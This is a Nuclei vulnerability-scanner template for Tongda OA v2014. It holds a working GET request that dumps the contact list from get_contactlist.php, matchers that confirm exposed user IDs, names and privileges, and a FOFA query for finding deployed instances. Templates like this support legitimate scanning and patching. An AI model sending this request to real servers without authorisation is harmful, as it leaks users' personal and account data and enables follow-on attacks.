nuclei-templates/http/vulnerabilities/tongda/tongda-contact-list-exposur...

33 lines
964 B
YAML
Executable File

id: tongda-contact-list-exposure
info:
name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
author: SleepingBag945
severity: medium
description: |
There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
metadata:
max-request: 1
verified: true
fofa-query: app="TDXK-通达OA"
tags: tongda,oa,exposure
http:
- method: GET
path:
- "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"
matchers-condition: and
matchers:
- type: word
words:
- 'user_uid":'
- 'user_name":'
- 'priv_name":'
condition: and
- type: status
status:
- 200